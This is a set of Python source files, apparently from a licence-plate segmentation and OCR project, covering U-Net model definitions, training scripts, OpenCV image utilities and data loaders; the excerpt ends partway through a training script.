"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import (\n Conv2D, Conv2DTranspose,\n Lambda, Input,\n MaxPooling2D, concatenate,\n)\n\n\ndef identity_function(x):\n return x\n\n\ndef normalize_image_shape(height, width):\n base = (2 ** 4)\n width = (width // base) * base + base * int(width > 0)\n height = (height // base) * base + base * int(height > 0)\n return height, width\n\n\ndef get_model_definition(img_height, img_width, in_channels, out_channels):\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n inputs = Input((img_height, img_width, in_channels))\n pre_processing = Lambda(lambda x: x / 255)(inputs)\n kwargs_conv2d = {\n 'kernel_size': (3, 3),\n 'activation': tf.keras.layers.LeakyReLU(alpha=0.1),\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n }\n h_dim = 10 # 100\n outs = {\n 1: h_dim, # 64\n 2: h_dim,\n 3: h_dim,\n 4: h_dim,\n 5: h_dim,\n }\n # Down\n c1 = Conv2D(outs[1], **kwargs_conv2d)(pre_processing)\n c1 = Conv2D(outs[1], **kwargs_conv2d)(c1)\n c2 = MaxPooling2D((2, 2))(c1)\n c2 = Conv2D(outs[2], **kwargs_conv2d)(c2)\n c2 = Conv2D(outs[2], **kwargs_conv2d)(c2)\n c3 = MaxPooling2D((2, 2))(c2)\n c3 = Conv2D(outs[3], **kwargs_conv2d)(c3)\n c3 = Conv2D(outs[3], **kwargs_conv2d)(c3)\n c4 = MaxPooling2D((2, 2))(c3)\n c4 = Conv2D(outs[4], **kwargs_conv2d)(c4)\n c4 = Conv2D(outs[4], **kwargs_conv2d)(c4)\n c5 = MaxPooling2D(pool_size=(2, 2))(c4)\n c5 = Conv2D(outs[5], **kwargs_conv2d)(c5)\n c5 = Conv2D(outs[5], **kwargs_conv2d)(c5)\n # Up\n u4 = Conv2DTranspose(outs[4], (2, 2), strides=(2, 2), padding='same')(c5)\n u4 = concatenate([u4, c4])\n u4 = Conv2D(outs[4], **kwargs_conv2d)(u4)\n u4 = Conv2D(outs[4], **kwargs_conv2d)(u4)\n u3 = Conv2DTranspose(outs[3], (2, 2), strides=(2, 2), padding='same')(u4)\n u3 = concatenate([u3, c3])\n u3 = Conv2D(outs[3], **kwargs_conv2d)(u3)\n u3 = Conv2D(outs[3], **kwargs_conv2d)(u3)\n u2 = Conv2DTranspose(outs[2], (2, 2), strides=(2, 2), padding='same')(u3)\n u2 = concatenate([u2, c2])\n u2 = Conv2D(outs[2], **kwargs_conv2d)(u2)\n u2 = Conv2D(outs[2], **kwargs_conv2d)(u2)\n u1 = Conv2DTranspose(outs[1], (2, 2), strides=(2, 2), padding='same')(u2)\n u1 = concatenate([u1, c1], axis=3)\n u1 = Conv2D(outs[1], **kwargs_conv2d)(u1)\n u1 = Conv2D(outs[1], **kwargs_conv2d)(u1)\n # Downward\n kwargs_conv2d = {\n 'activation': tf.keras.layers.LeakyReLU(alpha=0.1), # 'relu',\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n 'kernel_regularizer': tf.keras.regularizers.l1(0.001), # 'l1',\n }\n k_size = (3,) * 2\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(u1)\n x = MaxPooling2D((2, 2))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 2))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 2))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 2))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 1))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 1))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n outputs = Conv2D(out_channels, kernel_size=(1, 1), activation='sigmoid')(x)\n # Model compilation\n model = Model(inputs=[inputs], outputs=[outputs])\n model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n pre_process_input = identity_function\n return model, pre_process_input\n"
},
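A minimal usage sketch for the model factory above (the import path is an assumption: training_image_captioning.py later in this listing pulls these helpers from cv.tensorflow_models.unet2text2):

from cv.tensorflow_models.unet2text2 import get_model_definition, normalize_image_shape

# bump an arbitrary shape up to the next multiple of 16, as the asserts require
height, width = normalize_image_shape(50, 200)  # -> (64, 208)
model, pre_process_input = get_model_definition(
    img_height=height, img_width=width, in_channels=1, out_channels=2)
model.summary()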
{
"alpha_fraction": 0.6140684485435486,
"alphanum_fraction": 0.6273764371871948,
"avg_line_length": 29.941177368164062,
"blob_id": "b98e53918223772b322293a76c31f77a0c387c96",
"content_id": "e8fe0a50ec9f63711acf68e6936813709ec31da5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1578,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 51,
"path": "/services/plate_segmentation/training_pytorch.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import pathlib\n\nimport numpy as np\nfrom loguru import logger\n\nfrom cv.pytorch.pytorch_utils import train_model\nfrom cv.pytorch.unet_small import UNetSmall\nfrom io_utils.data_source import get_image_label, get_plates_bounding_metadata\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data/'\n folder = f'{path}/plates'\n dsize = (572, 572)\n params = {\n 'folder': folder,\n 'epochs': 1000,\n 'dsize': dsize,\n 'im_channels': 3,\n 'model_folder': f'{folder}/model',\n 'model_file': f'{folder}/model/best_model.model',\n 'labels': f\"{folder}/labels_plates.csv\",\n 'metadata': f\"{folder}/files.csv\",\n 'model_params': {\n 'in_channels': 3,\n 'out_channels': 2,\n },\n }\n return params\n\n\ndef train_plate_segmentation(params):\n dsize = params['dsize']\n folder = params['folder']\n metadata = get_plates_bounding_metadata(params)\n train_meta = metadata.query(\"set == 'train'\")\n test_meta = metadata.query(\"set == 'test'\")\n train_meta = set_index(train_meta)\n test_meta = set_index(test_meta)\n x_train, y_train = get_image_label(folder, train_meta, dsize)\n x_val, y_val = get_image_label(folder, test_meta, dsize)\n x_train = x_train.astype(np.float32)\n y_train = y_train.astype(np.float32)\n x_val = x_val.astype(np.float32)\n y_val = y_val.astype(np.float32)\n train_model(x_train, y_train, x_val, y_val, UNetSmall, params, logger)\n\n\nif __name__ == \"__main__\":\n train_plate_segmentation(get_params())\n"
},
{
"alpha_fraction": 0.6125984191894531,
"alphanum_fraction": 0.6362204551696777,
"avg_line_length": 20.89655113220215,
"blob_id": "0e91d24fec7d2f3f7b6f69b71177646fc0673cd6",
"content_id": "b69d95a167451a02d3c36233d486b8f9c4aec13e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 635,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 29,
"path": "/io_utils/tests/test_data_source.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport pathlib\n\nfrom io_utils.data_source import get_plates_text_metadata\n\n\ndef get_params():\n path = str(pathlib.Path().absolute().parent.parent)\n folder = f'{path}/data/plates'\n params = {\n 'folder': folder,\n 'labels': f\"{folder}/output_plate_segmentation/labels_plates_text-name_20200724050222.json\",\n 'metadata': f\"{folder}/files.csv\",\n }\n return params\n\n\ndef test_get_plates_text_metadata():\n params = get_params()\n plates_text_metadata = get_plates_text_metadata(params)\n a = 0\n\n\nif __name__ == \"__main__\":\n test_get_plates_text_metadata()\n"
},
{
"alpha_fraction": 0.5582290887832642,
"alphanum_fraction": 0.5851780772209167,
"avg_line_length": 26.342105865478516,
"blob_id": "6a123ee2d7a378e6dc227f6916544a35783774db",
"content_id": "5e2609a2896d83c4b9272651cdf43a952dac2516",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1039,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 38,
"path": "/cv/tensorflow_models/tests/test_unet_tensorflow.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\nimport numpy as np\n\nfrom cv.tensorflow_models.unet import get_model_definition\nfrom cv.tensorflow_models.tensorflow_utils import train_model\n\n\ndef test_train_model():\n from loguru import logger\n\n logger.info(f\"Start\")\n dsize = (576, 576)\n params = {\n 'dsize': dsize,\n 'im_channels': 1,\n 'epochs': 2,\n 'model_file': 'test.model',\n 'model_folder': './',\n }\n x_train = np.random.rand(1, dsize[0], dsize[1], 1)\n y_train = np.random.rand(1, dsize[0], dsize[1], 2)\n x_val = np.random.rand(1, dsize[0], dsize[1], 1)\n y_val = np.random.rand(1, dsize[0], dsize[1], 2)\n logger.info(f\"Call to train_model\")\n model_params = {\n 'img_height': dsize[0],\n 'img_width': dsize[1],\n 'in_channels': 1,\n 'out_channels': 2,\n }\n trained_model = train_model(\n x_train, y_train, x_val, y_val, get_model_definition, model_params,\n params, logger)\n assert trained_model is not None\n print(trained_model)\n"
},
{
"alpha_fraction": 0.6420056223869324,
"alphanum_fraction": 0.6490182280540466,
"avg_line_length": 40.33333206176758,
"blob_id": "1f9aa5c1d208a8c34e74b7e6f4ab830cef83ef7f",
"content_id": "d1921dbfe407677f5c27f5e0ab18f1854b0161f1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2852,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 69,
"path": "/services/plate_segmentation/training_tensorflow.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "from loguru import logger\n\nfrom cv.tensorflow_models.tensorflow_utils import train_model\nfrom cv.tensorflow_models.unet_little import get_model_definition\nfrom io_utils.data_source import (\n get_image_label, get_filenames,\n get_segmentation_labels)\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/input'\n output_folder = f'{path}/plates/plate_segmentation'\n # dsize = (576, 576)\n dsize = (256, 256)\n alphabet = [' ', 'plate']\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n in_channels = 3\n out_channels = len(alphabet)\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'epochs': 1000,\n 'dsize': dsize,\n 'model_folder': f'{output_folder}/model',\n 'model_file': f'{output_folder}/model/best_model.h5',\n 'labels': f\"{input_folder}/labels/segmentation\",\n 'alphabet': alphabet,\n 'model_params': {\n 'img_height': dsize[0],\n 'img_width': dsize[1],\n 'in_channels': in_channels,\n 'out_channels': out_channels,\n },\n }\n return params\n\n\ndef train_plate_segmentation(params):\n dsize = params['dsize']\n in_channels = params['model_params']['in_channels']\n out_channels = params['model_params']['out_channels']\n input_folder = params['input_folder']\n\n train_meta = get_filenames(f\"{input_folder}/train\")\n test_meta = get_filenames(f\"{input_folder}/test\")\n logger.info(f\"Train meta shape: {train_meta.shape}\")\n logger.info(f\"Test meta shape: {test_meta.shape}\")\n labels = get_segmentation_labels(params['labels'])\n train_meta = train_meta.merge(labels, on=['file_name'], how='left')\n test_meta = test_meta.merge(labels, on=['file_name'], how='left')\n train_meta = train_meta.loc[train_meta.label.notnull()]\n test_meta = test_meta.loc[test_meta.label.notnull()]\n train_meta = train_meta.sort_values(by=['file_name', 'date'], ascending=[False, False])\n test_meta = test_meta.sort_values(by=['file_name', 'date'], ascending=[False, False])\n train_meta = train_meta.drop_duplicates(subset=['file_name'])\n test_meta = test_meta.drop_duplicates(subset=['file_name'])\n train_meta = set_index(train_meta)\n test_meta = set_index(test_meta)\n logger.info(f\"Train meta shape: {train_meta.shape}\")\n logger.info(f\"Test meta shape: {test_meta.shape}\")\n x_train, y_train = get_image_label(input_folder, train_meta, dsize, in_channels, out_channels, params)\n x_val, y_val = get_image_label(input_folder, test_meta, dsize, in_channels, out_channels, params)\n train_model(x_train, y_train, x_val, y_val, get_model_definition, params, logger)\n\n\nif __name__ == \"__main__\":\n train_plate_segmentation(get_params())\n"
},
{
"alpha_fraction": 0.5378527045249939,
"alphanum_fraction": 0.571403980255127,
"avg_line_length": 25.660551071166992,
"blob_id": "027a8dd7237a6c459d2db867bf5cc59b5819aa5f",
"content_id": "7236cbd7d4579897083ba80444897c433708a0a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5812,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 218,
"path": "/cv/image_processing.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nimport math\nfrom PIL import Image\n\n\ndef save_image(im, filename):\n im = Image.fromarray(im)\n im.save(filename)\n\n\ndef get_contours_rgb(im, min_area, max_area):\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n hulls = get_contours_gray(im, min_area, max_area)\n return hulls\n\n\ndef get_contours_gray(im, min_area, max_area):\n ret, thresh = cv2.threshold(im, 50, 255, cv2.THRESH_BINARY)\n hulls = get_contours_binary(thresh, min_area, max_area)\n return hulls\n\n\ndef get_contours_binary(im, min_area, max_area):\n contours, hierarchy = cv2.findContours(im, cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = [c for c in contours if cv2.contourArea(c) > min_area]\n contours = [c for c in contours if cv2.contourArea(c) < max_area]\n hulls = []\n for i in range(len(contours)):\n hulls.append(cv2.convexHull(contours[i], False))\n return hulls\n\n\ndef get_lines(edges_im):\n lines = cv2.HoughLinesP(\n image=edges_im,\n rho=1,\n theta=1 * np.pi / 180,\n threshold=50,\n minLineLength=50,\n maxLineGap=10)\n return lines\n\n\ndef draw_lines(im, lines):\n color = (0, 255, 0)\n if lines is not None:\n for line in lines:\n for x1, y1, x2, y2 in line:\n cv2.line(im, (x1, y1), (x2, y2), color, 2)\n return im\n\n\ndef pred2im(im_set, dsize, image_idx, in_channels):\n if in_channels == 3:\n im = np.zeros((dsize[0], dsize[1], in_channels))\n im[:, :, 0] = im_set[image_idx, :, :, 0]\n im[:, :, 1] = im_set[image_idx, :, :, 0]\n im[:, :, 2] = im_set[image_idx, :, :, 0]\n else:\n im = np.zeros((dsize[0], dsize[1]))\n im[:, :] = im_set[image_idx, :, :, 0]\n im = im.astype('uint8')\n return im\n\n\ndef image_set2list(y_train_pred, y_val_pred):\n images = []\n for im_set in [y_train_pred, y_val_pred]:\n dsize = im_set.shape[1:3]\n for image_idx in range(im_set.shape[0]):\n im = pred2im(im_set, dsize, image_idx)\n images.append(im)\n return images\n\n\ndef get_rectangle(contours):\n rectangle = None\n if len(contours) > 0:\n contour = contours[0]\n rectangle = cv2.minAreaRect(contour)\n rectangle = cv2.boxPoints(rectangle)\n rectangle = np.int0(rectangle)\n return rectangle\n\n\ndef get_xs(rectangle):\n result = list(rectangle)\n c = np.mean(rectangle, axis=0)\n result.sort(key=lambda p: math.degrees(math.atan2(p[0] - c[0], -(p[1] - c[1]))))\n return result\n\n\ndef get_polygon(contour):\n epsilon = 0.1 * cv2.arcLength(contour, True)\n polygon = cv2.approxPolyDP(contour, epsilon, True)\n return polygon\n\n\ndef get_quadrilateral(contour):\n max_area = 0\n quadrilateral = None\n epochs = 2000\n contour = contour.reshape((-1, 2))\n for it in range(epochs):\n idxs = np.random.choice(range(len(contour)), size=4, replace=False)\n points = contour[idxs, :]\n area = cv2.contourArea(points)\n if area > max_area:\n max_area = area\n quadrilateral = points\n return quadrilateral\n\n\ndef get_warping(q, plate_shape):\n warp = None\n if q is not None:\n w, h = plate_shape\n p1 = [0, 0]\n p2 = [w - 1, 0]\n p3 = [w - 1, h - 1]\n p0 = [0, h - 1]\n dst = np.array([p1, p2, p3, p0], dtype=np.float32)\n x0, x1, x2, x3 = get_xs(q)\n q = np.array([x1, x2, x3, x0], dtype=np.float32)\n warp = cv2.getPerspectiveTransform(q, dst)\n return warp\n\n\ndef warp_image(im, warp, plate_shape):\n if warp is not None:\n im = cv2.warpPerspective(im, warp, plate_shape)\n return im\n\n\ndef rotate_image(image, center, theta):\n \"\"\"\n Rotates image around center with angle theta in radians\n \"\"\"\n\n theta_degrees = theta * 180 / np.pi\n shape = (image.shape[1], image.shape[0])\n center = 
tuple(center)\n matrix = cv2.getRotationMatrix2D(\n center=center, angle=theta_degrees, scale=1)\n image = cv2.warpAffine(src=image, M=matrix, dsize=shape)\n return image\n\n\ndef crop_image(im, rectangle):\n x0, x1, x2, x3 = rectangle\n w = np.linalg.norm(x3 - x0)\n h = np.linalg.norm(x1 - x0)\n cx, cy = x1\n dh = 5\n dw = 5\n im = im[max(0, cy - dh):min(im.shape[1], int(cy + h + dh)),\n max(0, cx - dw):min(im.shape[1], int(cx + w + dw))]\n return im\n\n\ndef get_theta(x0, x3):\n tan_theta = (x3[1] - x0[1]) / (x3[0] - x0[0])\n theta = np.arctan(tan_theta)\n return theta\n\n\ndef print_images(images, metadata, folder, name, logger):\n logger.info(f\"Saving {name} images\")\n for image_filename, im in zip(metadata.file_name, images):\n image_name = image_filename.split('.')[0]\n save_image(im, f\"{folder}/{name}_{image_name}.png\")\n\n\ndef has_dark_font(im):\n h, w = im.shape\n low_t = 0.1\n high_t = 0.9\n im = im[int(low_t * h):int(high_t * h), int(low_t * w):int(high_t * w)]\n im = cv2.threshold(im, im.mean(), 255, cv2.THRESH_BINARY)[1]\n result = im.mean() > 255 / 2\n return result\n\n\ndef get_binary_im(im):\n if im is not None:\n im = cv2.threshold(im, np.median(im), 255, cv2.THRESH_BINARY)[1]\n return im\n\n\ndef get_center_point(r):\n if r is not None:\n r = r.mean(axis=0).astype(int)\n return r\n\n\ndef get_y_limits(im):\n borders = ~(im[:, :, 0].mean(axis=1) > 0.20 * 255)\n return borders\n\n\ndef print_limits(im):\n borders = ~(im.mean(axis=1) > 0.20 * 255)\n mp = int(len(im) / 2)\n up, lp = None, None\n for idx in range(mp, 0, -1):\n if borders[idx]:\n up = idx\n break\n for idx in range(mp, len(im), 1):\n if borders[idx]:\n lp = idx\n break\n if up is not None and lp is not None:\n im[0:up, :] = 0\n im[lp:len(im), :] = 0\n return im\n"
},
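Two apparent slips in image_processing.py as shown: image_set2list calls pred2im without the in_channels argument its signature requires, and crop_image clamps row indices with im.shape[1] (width) where im.shape[0] (height) is meant. A hedged fix sketch for the first, assuming pred2im is imported from this module:

from cv.image_processing import pred2im

def image_set2list(y_train_pred, y_val_pred, in_channels=1):
    # corrected variant: pass in_channels through to pred2im
    images = []
    for im_set in [y_train_pred, y_val_pred]:
        dsize = im_set.shape[1:3]
        for image_idx in range(im_set.shape[0]):
            images.append(pred2im(im_set, dsize, image_idx, in_channels))
    return images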
{
"alpha_fraction": 0.5805470943450928,
"alphanum_fraction": 0.6013373732566833,
"avg_line_length": 35.074562072753906,
"blob_id": "674561748a093da44d907f60ac65e5e127344f8d",
"content_id": "0bbd51ea5c1fa0e585aeb80b4169592858afccce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8225,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 228,
"path": "/io_utils/data_source.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nimport pandas as pd\nimport glob\n\nfrom cv.image_processing import get_xs\nfrom io_utils.read_polygons_json import get_labels_plates_text\n\n\ndef load_image(im_data, folder, dsize, in_channels):\n dsize_cv2 = (dsize[1], dsize[0])\n image = im_data.file_name\n im_file = f\"{folder}/{image}\"\n im = cv2.imread(im_file)\n assert im is not None, f\"Error while reading image: {im_file}\"\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n if in_channels == 3:\n im = cv2.cvtColor(im, cv2.COLOR_GRAY2RGB)\n im = cv2.resize(im, dsize=dsize_cv2, interpolation=cv2.INTER_CUBIC)\n return im\n\n\ndef load_image_label(im_data, folder, dsize, in_channels, alphabet):\n dsize_cv2 = (dsize[1], dsize[0])\n im_file = im_data.file_path.values[0]\n # Image load\n im = cv2.imread(im_file)\n assert im is not None, f\"Error while reading image: {im_file}\"\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n im_shape = (im.shape[0], im.shape[1])\n if in_channels == 3:\n im = cv2.cvtColor(im, cv2.COLOR_GRAY2RGB)\n im = cv2.resize(im, dsize=dsize_cv2, interpolation=cv2.INTER_CUBIC)\n # Setting labels\n gt = np.zeros((dsize[0], dsize[1], len(alphabet)))\n gt = gt.astype('uint8')\n for row in im_data.itertuples():\n im_label, label_idx = get_labels(alphabet, dsize_cv2, im_shape, row)\n gt[:, :, label_idx] = im_label\n # Filling the zero class (non in the alphabet)\n gt_zero = gt.max(axis=2)\n gt_zero = (gt_zero == 0.0).astype(int)\n gt[:, :, 0] = gt_zero\n return im, gt\n\n\ndef get_labels(alphabet, dsize_cv2, im_shape, row):\n label = row.label\n label_idx = alphabet[label]\n p0 = row.x0, row.y0\n p1 = row.x1, row.y1\n p2 = row.x2, row.y2\n p3 = row.x3, row.y3\n pts = np.array([p0, p1, p2, p3], np.int32)\n pts = list(get_xs(pts))\n pts = np.array(pts, np.int32)\n pts = [pts.reshape((-1, 1, 2))]\n im_label = np.zeros(im_shape)\n cv2.fillPoly(im_label, pts, color=1)\n im_label = cv2.resize(im_label, dsize=dsize_cv2, interpolation=cv2.INTER_CUBIC)\n return im_label, label_idx\n\n\ndef get_image_label(folder, metadata, dsize, in_channels, out_channels, params):\n alphabet = params['alphabet']\n image_name_list = metadata.file_name.unique()\n set_size = len(image_name_list)\n x = np.zeros((set_size, dsize[0], dsize[1], in_channels))\n y = np.zeros((set_size, dsize[0], dsize[1], out_channels))\n for image_name in image_name_list:\n image_data = metadata.loc[metadata.file_name == image_name]\n idx = image_data.idx.values[0]\n im, gt = load_image_label(image_data, folder, dsize, in_channels, alphabet)\n if in_channels == 3:\n x[idx, :, :, :] = im[:, :, 0:in_channels]\n else:\n x[idx, :, :, 0] = im[:, :]\n y[idx, :, :, :] = gt\n return x, y\n\n\ndef get_image(filename, dsize, in_channels):\n x = np.zeros((1, dsize[0], dsize[1], in_channels))\n dsize_cv2 = (dsize[1], dsize[0])\n # Image load\n im = cv2.imread(filename)\n assert im is not None, f\"Error while reading image: {filename}\"\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n if in_channels == 3:\n im = cv2.cvtColor(im, cv2.COLOR_GRAY2RGB)\n im = cv2.resize(im, dsize=dsize_cv2, interpolation=cv2.INTER_CUBIC)\n if in_channels == 3:\n x[0, :, :, :] = im[:, :, 0:in_channels]\n else:\n x[0, :, :, 0] = im[:, :]\n return x\n\n\ndef get_image_text_label(folder, metadata, dsize, in_channels, out_channels, alphabet):\n image_name_list = metadata.image_name.unique()\n set_size = len(image_name_list)\n text_max_len = 13\n x = np.zeros((set_size, dsize[0], dsize[1], in_channels))\n y = np.zeros((set_size, 1, text_max_len, out_channels))\n for row in 
metadata.itertuples():\n plate_text = row.plate.lower()\n plate_text = f\"{plate_text: <{text_max_len}}\"\n idx = row.idx\n for idx_letter in range(text_max_len):\n label = plate_text[idx_letter]\n label_idx = alphabet[label]\n y[idx, 0, idx_letter, label_idx] = 1.0\n im = np.zeros((dsize[0], dsize[1], in_channels))\n if in_channels == 1:\n im = np.zeros((dsize[0], dsize[1]))\n try:\n im = load_image(row, folder, dsize, in_channels)\n except Exception as e:\n pass\n if in_channels == 3:\n x[idx, :, :, :] = im[:, :, 0:in_channels]\n else:\n x[idx, :, :, 0] = im[:, :]\n return x, y\n\n\ndef generate_txt(inv_alphabet):\n text_len = np.random.randint(4, 10)\n text = np.random.randint(len(inv_alphabet), size=text_len)\n text = [inv_alphabet[idx] for idx in text]\n text = ''.join(text)\n text = text.upper()\n return text\n\n\ndef get_image_text_label_sim(dsize, in_channels, out_channels, alphabet):\n inv_alphabet = {alphabet[char]: char for char in alphabet.keys()}\n set_size = 1000\n text_max_len = 13\n font = cv2.FONT_HERSHEY_TRIPLEX\n clr = (255, 255, 255)\n pos = (30, 30)\n line = cv2.LINE_AA\n x = np.zeros((set_size, dsize[0], dsize[1], in_channels))\n y = np.zeros((set_size, 1, text_max_len, out_channels))\n for idx in range(set_size):\n plate_text = generate_txt(inv_alphabet)\n plate_text = f\"{plate_text: <{text_max_len}}\"\n plate_text_buff = plate_text.lower()\n for idx_letter in range(text_max_len):\n label = plate_text_buff[idx_letter]\n label_idx = alphabet[label]\n y[idx, 0, idx_letter, label_idx] = 1.0\n im = np.zeros((dsize[0], dsize[1])).astype('uint8')\n im = cv2.cvtColor(im, cv2.COLOR_GRAY2RGB)\n im = cv2.putText(im, plate_text, pos, font, 1, clr, 2, line)\n if im.shape[2] == 3:\n x[idx, :, :, :] = im[:, :, 0:in_channels]\n else:\n x[idx, :, :, 0] = im[:, :]\n return x, y\n\n\ndef load_label_data(labels):\n labels = labels.groupby(['filename']).apply(\n lambda x: x.assign(point_idx=range(len(x)))).reset_index(drop=True)\n labels_x = labels.pivot(\n index='filename',\n columns='point_idx',\n values='x'\n )\n labels_x.columns = [f\"x{c}\" for c in labels_x.columns]\n labels_x = labels_x.reset_index(drop=False)\n labels_y = labels.pivot(\n index='filename',\n columns='point_idx',\n values='y'\n )\n labels_y.columns = [f\"y{c}\" for c in labels_y.columns]\n labels_y = labels_y.reset_index(drop=False)\n labels_wh = labels.drop_duplicates(['filename'])[['filename', 'w', 'h']]\n labels2 = labels_wh.merge(labels_x, on=['filename'], how='left')\n labels2 = labels2.merge(labels_y, on=['filename'], how='left')\n return labels2\n\n\ndef get_plates_bounding_metadata(params):\n metadata = params['metadata']\n labels = params['labels']\n metadata = pd.read_csv(metadata)\n labels = pd.read_csv(labels, sep=',')\n labels = load_label_data(labels)\n labels = labels.rename(columns={'filename': 'image'})\n metadata = metadata.merge(labels, on=['image'], how='left')\n return metadata\n\n\ndef get_filenames(path):\n files = glob.glob(f\"{path}/*.jpg\")\n files = pd.Series(files)\n files = files.rename('file_path')\n files = files.to_frame()\n file_name = files.file_path.str.split('/').str[-1]\n file_name = file_name.str.split('.').str[0]\n files = files.assign(file_name=file_name)\n return files\n\n\ndef get_segmentation_labels(path):\n labels = glob.glob(f\"{path}/*.json\")\n dates = [label.split('/')[-1] for label in labels]\n dates = [date.split('.')[0] for date in dates]\n dates = [date.split('_')[-1] for date in dates]\n labels = [get_labels_plates_text(label) for label in labels]\n labels = 
[label.assign(date=date) for label, date in zip(labels, dates)]\n labels = pd.concat(labels, axis=0)\n labels = labels.rename(columns={'filename': 'file_name'})\n labels.file_name = labels.file_name.str.split('.').str[0]\n return labels\n\n\ndef get_plates_text_metadata(params):\n metadata = params['metadata']\n metadata = pd.read_csv(metadata)\n metadata = metadata.assign(image_name=metadata.file_name)\n metadata.image_name = metadata.image_name.str.split('.').str[0]\n metadata.image_name = metadata.image_name.str.split('_').str[-1]\n return metadata\n"
},
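A tiny self-contained demo of the pivot performed by load_label_data above (toy values only; the real labels arrive as one CSV row per polygon corner):

import pandas as pd
from io_utils.data_source import load_label_data

labels = pd.DataFrame({
    'filename': ['a.jpg'] * 4,
    'x': [0, 10, 10, 0],
    'y': [0, 0, 5, 5],
    'w': [10] * 4,
    'h': [5] * 4,
})
wide = load_label_data(labels)
print(wide.columns.tolist())
# ['filename', 'w', 'h', 'x0', 'x1', 'x2', 'x3', 'y0', 'y1', 'y2', 'y3']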
{
"alpha_fraction": 0.6076208353042603,
"alphanum_fraction": 0.6211895942687988,
"avg_line_length": 37.156028747558594,
"blob_id": "24ea7a447e0314c6abfedf831102f5520a3bd339",
"content_id": "ae2056b70efeb89a2ceeb30f3b3fb831c14f44a8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5380,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 141,
"path": "/services/plate_ocr/training_image_captioning.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nfrom loguru import logger\n\nfrom io_utils.data_source import (\n get_plates_text_metadata,\n get_image_text_label,\n)\nfrom io_utils.image_text_label_generator import ImageTextLabelGenerator\nfrom io_utils.utils import set_index\nfrom cv.tensorflow_models.cnn_encoder import CNN_Encoder\nfrom cv.tensorflow_models.rnn_decoder import RNN_Decoder\nfrom cv.tensorflow_models.unet2text2 import (\n get_model_definition,\n normalize_image_shape\n)\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/plate_segmentation'\n output_folder = f'{path}/plates/plate_ocr'\n width = 200\n height = 50\n height, width = normalize_image_shape(height, width)\n # height = height + 1\n # width = width + 1\n dsize = (height, width)\n alphabet = ' abcdefghijklmnopqrstuvwxyz0123456789'\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n in_channels = 1\n out_channels = len(alphabet)\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'epochs': 1 * 1000,\n 'dsize': dsize,\n 'model_folder': f'{output_folder}/model',\n 'model_file': f'{output_folder}/model/best_model.h5',\n 'metadata': f\"{path}/plates/input/labels/ocr/files.csv\",\n 'alphabet': alphabet,\n 'model_params': {\n 'img_height': dsize[0],\n 'img_width': dsize[1],\n 'in_channels': in_channels,\n 'out_channels': 